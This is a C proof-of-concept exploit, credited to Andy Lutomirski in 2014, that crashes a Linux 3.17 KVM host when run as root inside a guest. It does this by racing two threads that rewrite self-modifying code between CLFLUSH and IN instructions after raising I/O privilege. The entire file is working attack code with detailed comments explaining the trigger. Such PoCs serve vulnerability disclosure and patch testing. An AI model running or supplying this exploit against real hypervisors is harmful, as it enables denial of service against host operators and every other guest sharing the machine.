// KVM clflush sploit (crashes a Linux 3.17 host when run as root inside a KVM guest)
// Copyright (c) 2014 Andy Lutomirski

#include <pthread.h>
#include <err.h>
#include <stdio.h>
#include <stdint.h>
#include <signal.h>
#include <setjmp.h>
#include <string.h>
#include <stdbool.h>
#include <sys/io.h>

// Self-modifying code target.  `.wtext` is created "awx" (allocatable,
// writable, executable) so the two threads below can rewrite the
// instruction bytes at runtime while they are being executed.  Expect
// newer binutils ld to warn about the resulting RWX LOAD segment; that is
// inherent to this PoC, not a build error.
//
// Byte layout of badcode, from the encodings of the two instructions
// (CLFLUSH is 0F AE /7, RIP-relative ModRM 0x3d, disp32 0; RET is C3):
//   0f ae 3d 00 00 00 00   clflush 0x0(%rip)
//   c3                     ret
// proc() and main() only ever touch the first two bytes, as one u16.
asm (".pushsection .wtext, \"awx\"\n"
     "badcode:\n\t"
     "clflush (%rip)\n\t"
     "ret\n"
     ".popsection");

// The label above viewed as an array of 16-bit halves (little-endian on
// x86-64): index 0 covers the opcode bytes 0f ae.  volatile because one
// thread writes it while another overwrites it and main() also executes
// it; the data race between the two writers is intentional.
extern volatile unsigned short badcode[];

/*
 * Restorer thread: spins forever rewriting the first two bytes of badcode
 * with 0xae0f, i.e. the little-endian byte pair 0f ae that begins the
 * original `clflush (%rip)` encoding.  main() keeps replacing the same two
 * bytes with an IN instruction, so the two threads race over what is
 * fetched from badcode; that race is the whole point of the PoC.
 *
 * @ignored  unused; present only to satisfy the pthread start-routine type.
 * @return   never returns (the loop is infinite).
 */
static void *proc(void *ignored)
{
	(void)ignored;
	for (;;)
		badcode[0] = 0xae0f;	/* bytes 0f ae: start of the clflush encoding */
	return NULL;
}

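/*
 * Entry point.  Must run as root (or with CAP_SYS_RAWIO) inside a KVM
 * guest: iopl(3) raises the task's I/O privilege level so that the IN
 * instruction placed in badcode executes from user mode instead of
 * faulting with #GP; the port access is what causes the VM exit that
 * hands the instruction to the host.
 *
 * Loop: store 0x00e4 over badcode's first two bytes, i.e. the byte
 * sequence e4 00 = `in $0x0,%al`.  The rest of the original clflush
 * encoding (3d 00 00 00 00 c3) then decodes as `cmp $0x0,%eax; ret`,
 * which is why the asm below clobbers "ax" and "flags".  The proc()
 * thread keeps writing the clflush bytes back, so which instruction the
 * CPU fetches - and, presumably, which one the host's emulator sees when
 * it re-reads the bytes to handle the port-I/O exit - is a race.  That
 * race is the intended trigger (inferred from the structure of the PoC;
 * confirm against the 3.17 KVM emulator if the details matter).
 *
 * Never returns on success; exits 1 if iopl() or pthread_create() fails.
 */
int main(void)
{
	/* iopl(3) requires CAP_SYS_RAWIO; without it IN would #GP in the guest. */
	if (iopl(3) != 0)
		err(1, "iopl");

	pthread_t pth;
	/* pthread_create reports failure via its return value, not errno. */
	int rc = pthread_create(&pth, NULL, proc, NULL);
	if (rc != 0)
		errx(1, "pthread_create: %s", strerror(rc));

	while (true) {
		badcode[0] = 0x00e4;	/* bytes e4 00: in $0x0,%al */
		/*
		 * Direct call into the patched buffer.  No "memory" clobber is
		 * needed: badcode is volatile and the callee touches no C data.
		 * NOTE(review): the call pushes a return address below %rsp, so
		 * this relies on the compiler keeping no live data in the red zone
		 * here (main is not a leaf function, so GCC does not).
		 */
		asm volatile ("call badcode" : : : "ax", "flags");
	}
}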